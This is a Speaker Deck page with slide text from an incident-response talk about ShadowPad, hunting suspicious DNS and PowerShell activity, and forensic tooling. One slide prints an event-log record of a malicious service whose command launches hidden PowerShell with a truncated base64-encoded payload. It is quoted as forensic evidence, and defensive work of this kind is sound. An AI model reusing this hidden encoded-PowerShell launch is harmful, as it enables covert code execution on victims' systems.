Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
February 10, 2018
Education
0
300

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
200
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
140
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
220
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
190
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
160
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
180
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
260
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
310
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
370

Other Decks in Education

See All in Education
81689b093f75cf3f383e581ca57188df?s=48 minecr
0
110
0a741f935003a289716373693b95db34?s=48 s64
0
100
Dcd6ae6de2452585b6d18137a4e1cd97?s=48 miurant
0
810
C002578e20fc7015b8d555c85c1f0e99?s=48 norikokato
0
170
4103e5b7039a946281b536e04e86795f?s=48 okumakito
0
120
E49f52f943e3f1ee664e949ae95a235b?s=48 y_ogawa_mhg
0
440
8c6c4d64f6fd9e19226ef0b210433fd3?s=48 cbtlibrary
0
150
1bd481f09a414a99f0460b511146f685?s=48 m3_education
0
710
095f653ba8648c9e74c1c95b4d2f38d6?s=48 pkld
0
540
18cdb6f294c8cb10a46167e462c2a51f?s=48 matleenalaakso
0
5.4k
8c6c4d64f6fd9e19226ef0b210433fd3?s=48 cbtlibrary
0
120
Ca932babb9a1a7a7b426b94856fc5a84?s=48 cpimentelart
0
110

Featured

See All Featured
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
342
16k
B47b288784fda77a94aeb234ca743c24?s=48 keavy
110
15k
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
55
4.6k
E190023b66e2b8aa73a842b106920c93?s=48 zenorocha
300
40k
C7393b7ba7ec9c8890dd77d209fbb3c9?s=48 maltzj
504
37k
027d1ebf66cc039a0bd3b55eeadbe75d?s=48 sachag
448
36k
E6c6e133e74c3b83f04d2861deaa1c20?s=48 searls
207
38k
E43f8dfd01057f8304f5f8fb9a294d7d?s=48 jeffersonlam
333
16k
9fa239b3154a0169d99ab7bf1422dd12?s=48 marcelosomers
224
15k
Ded01cdab114abe4ec13511e4c25b9bb?s=48 andyhume
66
4.1k
A9704266587836f7e784235e5073b93e?s=48 jmmastey
19
4.9k
D09fad3e36ae6841f54820be0e907f7a?s=48 rocio
156
12k

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab

  2. Challenge: find a SDC bus speed

  3. None

  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

  7. DNS requests

  8. None
  9. None

  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None

  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

  26. What to do? we need logs we need mfts we

    need regs

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn

  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None

  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab